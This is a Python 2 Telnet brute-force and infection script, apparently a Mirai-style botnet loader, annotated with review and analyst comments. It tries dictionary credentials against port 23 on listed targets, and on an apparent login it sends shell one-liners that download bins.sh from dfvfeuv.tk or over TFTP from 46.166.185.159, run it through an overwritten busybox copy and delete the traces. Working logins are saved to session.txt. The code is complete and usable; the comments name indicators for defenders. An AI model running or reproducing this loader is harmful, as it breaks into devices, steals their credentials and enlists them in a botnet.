#!/usr/bin/env python
|
|
#
|
|
#
|
|
# I didn't really check for backdoors, so please be careful
|
|
#
|
|
#
|
|
#
|
|
from Queue import *
|
|
from sys import stdout
|
|
import threading, sys, time, random, socket, re, os, logging
|
|
# Command-line handling and shared state for the Telnet credential scanner.
# NOTE(review): this listing has lost its indentation, so which statements
# belong to the `if` below is inferred from syntax -- confirm against upstream.
# The code is Python 2 (print statements, the `Queue` module).
# Arguments, as read below and described by the usage text:
#   argv[1] = file of target addresses, one per line
#   argv[2] = credential dictionary, one "user:pass" pair per line
#   argv[3] = number of worker threads
#   argv[4] = number of addresses a worker pulls per batch
if len(sys.argv) < 5:
|
|
print "Example: python %s targets.txt dictionary.txt <threads(1-100)> <ips per scan(100-1000)>" % (str(sys.argv[0]))
|
|
print "Dictionary should be in user:pass format"
|
|
sys.exit(1)
|
|
|
|
# Banner only; the escape sequences are ANSI colour codes.
print "\x1b[1;32m***********************\x1b[1;35m"
|
|
print "\x1b[1;32m* YAAAAAAAAAAAAAAAAAA *\x1b[1;35m"
|
|
print "\x1b[1;32m***********************\x1b[1;35m"
|
|
|
|
#ip=sys.argv[1]
|
|
# Path of the credential dictionary; re-opened by ipthread() for every target.
filename=sys.argv[2]
|
|
# int() is applied without validation; the 1-100 and 100-1000 ranges in the
# usage text are not enforced anywhere in this file.
threads = int(sys.argv[3])
|
|
h0h0 = int(sys.argv[4])
|
|
# The whole target list is read into memory; the file object is never
# explicitly closed.
ips = open(sys.argv[1], "r").readlines()
|
|
# Work queue of target addresses shared by all worker threads.
queue = Queue()
|
|
# Counter used only for the "Added to queue" progress line.
qcount = 0
|
|
|
|
# Shell one-liners that attempt() sends over Telnet after a login that looks
# successful. Only `wget`, `tftp1` and `tftp2` are live; the echo, ftpget and
# curl variants are commented out.
# Each live command changes into the first directory of its list that exists,
# fetches a script named bins.sh from a remote host (HTTP via wget, or TFTP),
# stores it as "dvrHelper", copies /bin/busybox into the current directory,
# overwrites that copy with the downloaded script, runs the copy, and then
# deletes both files.
# Analyst notes (indicators as they appear in this file, defanged here):
#   network: dfvfeuv[.]tk, kimuuk[.]tk, 46.166.185[.]159 (HTTP and TFTP)
#   host:    files named "dvrHelper" / "bins.sh", and a file named "busybox"
#            executed from a writable directory such as /tmp or /var/run
# The overwrite of a busybox copy presumably yields an executable file
# without a chmod call -- TODO confirm against a sample run.
#cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://kimuuk.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper
|
|
wget = "cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /; wget http://dfvfeuv.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
|
|
#echo = "cd /var/; rm -rf busybox filename; rm -rf busybox armv4l.sh; echo -ne 'GET /armv4l.sh HTTP/1.0\r\nHost: 46.166.185.159\r\n\r\n' | nc 46.166.185.159 80 > armv4l.sh; chmod +x *; sed -i 1,9d armv4l.sh; cp /bin/busybox ./; busybox cat armv4l.sh > armv4l.sh; chmod +x armv4l.sh; ./armv4l.sh; rm -rf busybox armv4l.sh;"
|
|
tftp1 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp 46.166.185.159 -c get bins.sh; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
|
|
tftp2 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp -r bins.sh -g 46.166.185.159; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
|
|
#ftpget = "cd /var/; rm -rf armv4l; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.159 armv4l armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
|
|
#curl = "cd /var/; rm -rf armv4l; curl -O http://kimuuk.tk/bins/armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
|
|
|
|
# Load every line of the target file into the shared queue, printing a
# running count on one console line ("\r" rewinds the cursor).
# Lines are queued exactly as read, trailing newline included; worker()
# strips them with rstrip() before use.
# NOTE(review): indentation is missing here; the final print presumably runs
# once after the loop -- confirm against upstream.
for ip in ips:
|
|
qcount += 1
|
|
stdout.write("\r[%d] Added to queue" % qcount)
|
|
stdout.flush()
|
|
queue.put(ip)
|
|
print "\n"
|
|
|
|
# Read from socket `tn` until `string` shows up in the accumulated data or
# `timeout` seconds have passed.
#   tn      -- connected socket; attempt() passes one with a 5 s timeout set
#   string  -- marker to wait for (callers pass ":")
#   timeout -- overall budget in seconds, default 20
# Returns the accumulated buffer once the marker is seen. The raise at the
# end is commented out, so running out of time returns None implicitly; the
# callers do `hoho += readUntil(...)`, which then fails inside their
# `except Exception` handler.
# NOTE(review): indentation is missing from this listing; the recv, sleep and
# membership test are presumably all inside the while loop -- confirm.
def readUntil(tn, string, timeout=20):
|
|
buf = ''
|
|
start_time = time.time()
|
|
while time.time() - start_time < timeout:
|
|
# Up to 1024 bytes per read; recv() itself can raise on the socket timeout.
buf += tn.recv(1024)
|
|
time.sleep(0.01)
|
|
if string in buf: return buf
|
|
#raise Exception('TIMEOUT!')
|
|
|
|
# Worker loop: take target addresses off the shared queue in batches and
# start one ipthread() thread per address.
# Reads the module-level `queue` and `h0h0` (batch size from argv[4]).
# NOTE(review): indentation is missing from this listing, so the nesting of
# the two try blocks, the while loop and the for loops is inferred, not shown.
# Both handlers are bare `except:` clauses, so every error raised in the loop
# is swallowed; under Python 2 that includes the SystemExit raised by
# sys.exit(1) if the exit call sits inside the inner try -- confirm.
def worker():
|
|
try:
|
|
while True:
|
|
try:
|
|
if queue.empty() == True:
|
|
sys.exit(1)
|
|
iplist = []
|
|
# One more address than the configured batch size is taken per round.
h0h0h0 = h0h0 + 1
|
|
#print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
|
|
for x in xrange(h0h0h0):
|
|
# queue.get() blocks when the queue holds fewer entries than the batch needs.
ip = queue.get()
|
|
iplist.append(ip)
|
|
#print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
|
|
# The item is marked done as soon as it is dequeued, before any connection
# is attempted, so queue.join() does not wait for the login attempts.
queue.task_done()
|
|
time.sleep(1.5)
|
|
for ip in iplist:
|
|
# The second argument is the literal string "null"; ipthread() never reads it.
t = threading.Thread(target=ipthread, args=(ip.rstrip(),"null"))
|
|
t.start()
|
|
time.sleep(0.009)
|
|
time.sleep(1)
|
|
#print "\033[32mStarting Telnet Threads\033[37m"
|
|
except:
|
|
print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
|
|
pass
|
|
except:
|
|
pass
|
|
|
|
|
|
# One Telnet login attempt against IP on TCP port 23 with a single
# username/password pair, followed by delivery of the module-level download
# commands when the reply looks like a shell.
#   IP       -- target address
#   UserName -- login name to try
#   Password -- password to try
# Returns nothing. Side effects: network traffic to IP:23, a "Found" line on
# stdout and a line appended to session.txt for each apparent success.
# NOTE(review): indentation is missing from this listing, so which statements
# sit inside each `if` and `try` is inferred -- confirm against upstream.
# Analyst notes:
#   - Network signature: shortly after the password, the client sends the
#     bare commands "wget", "tftp" and "ifconfig" back to back, then long
#     one-liners referencing "dvrHelper" and "busybox".
#   - Forensic artefact: session.txt in the working directory holds
#     "IP:23 user:pass" records in plain text.
#   - The loop only works against devices that expose Telnet and accept a
#     dictionary credential; disabling Telnet or replacing default
#     credentials removes that exposure.
def attempt(IP,UserName,Password):
|
|
try:
|
|
# These three locals are assigned but the rest of the function uses the
# parameters directly.
ip=IP
|
|
username=UserName
|
|
password=Password
|
|
tn = socket.socket()
|
|
tn.settimeout(5)
|
|
tn.connect((IP, 23))
|
|
#except Exception:
|
|
#print "[%s] Timeout"%(count)
|
|
#try:
|
|
time.sleep(0.01)
|
|
hoho = ''
|
|
# Wait for the first ":" and treat "ogin"/"sername" as the login prompt
# (matches both capitalisations of Login/Username).
hoho += readUntil(tn, ":")
|
|
if "ogin" in hoho or "sername" in hoho:
|
|
tn.send(UserName + "\n")
|
|
except Exception:
|
|
# The socket is closed on failure, but the following try blocks still use it;
# their own handlers swallow the resulting errors.
tn.close()
|
|
try:
|
|
hoho = ''
|
|
hoho += readUntil(tn, ":")
|
|
if "assword" in hoho:
|
|
tn.send(Password + "\n")
|
|
# Probe commands: their output (or error text) is what the next block checks.
tn.send("wget\n")
|
|
tn.send("tftp\n")
|
|
tn.send("ifconfig\n")
|
|
time.sleep(3)
|
|
except Exception:
|
|
tn.close()
|
|
try:
|
|
mp = ''
|
|
# A single read of at most 1024 bytes decides whether the login worked.
mp += tn.recv(1024)
|
|
#if "#" in mp or "$" in mp or "@" in mp or ">" in mp:
|
|
# Any of these substrings is taken as evidence of a working shell.
if "addr" in mp or "Usage" in mp or "wget:" in mp or "tftp:" in mp or "ifconfig:" in mp or "@" in mp:
|
|
tn.send(wget + "\n")
|
|
#tn.send(echo + "\n")
|
|
tn.send(tftp1 + "\n")
|
|
tn.send(tftp2 + "\n")
|
|
#tn.send(ftpget + "\n")
|
|
#tn.send(curl + "\n")
|
|
print '\x1b[1;32mFound \x1b[1;31m '+IP+':23 \x1b[1;35m'+UserName+':\x1b[1;36m'+Password+'\x1b[1;33m'
|
|
# Appended from many threads at once with no lock.
f = open('session.txt', 'a')
|
|
f.write("%s:23 %s:%s\n" % (IP, UserName, Password))
|
|
f.close()
|
|
# The connection is held open for 15 s before closing.
time.sleep(15)
|
|
tn.close()
|
|
except Exception:
|
|
tn.close()
|
|
|
|
# For one target address, start an attempt() thread for every entry in the
# credential dictionary, 0.3 s apart.
#   ip   -- target address (already stripped by worker())
#   null -- unused placeholder; worker() passes the string "null"
# Reads the module-level `filename`; the file is re-opened and re-read for
# every target.
# Each line is split on ":" into exactly two fields, so a line with no colon
# or more than one raises ValueError here, and nothing in this function
# catches it.
# NOTE(review): indentation is missing from this listing; fd.close()
# presumably runs once after the loop -- confirm against upstream.
def ipthread(ip,null):
|
|
fd = open(filename, "r")
|
|
for line in fd.readlines():
|
|
username, password = line.strip().split(":")
|
|
t = threading.Thread(target=attempt, args=(ip,username,password))
|
|
t.start()
|
|
time.sleep(0.3)
|
|
fd.close()
|
|
|
|
# Entry point: start `threads` daemon worker threads, then wait on the queue.
# worker() calls task_done() as soon as an address is dequeued, so
# queue.join() returns once every address has been taken off the queue, not
# once the login attempts have finished.
# NOTE(review): indentation is missing from this listing; queue.join() and
# the final print presumably run once after the loop -- confirm.
for g in xrange(threads):
|
|
t = threading.Thread(target=worker)
|
|
# Daemon threads do not keep the interpreter alive on their own.
t.setDaemon(True)
|
|
t.start()
|
|
time.sleep(0.001)
|
|
|
|
queue.join()
|
|
print "Finished!" |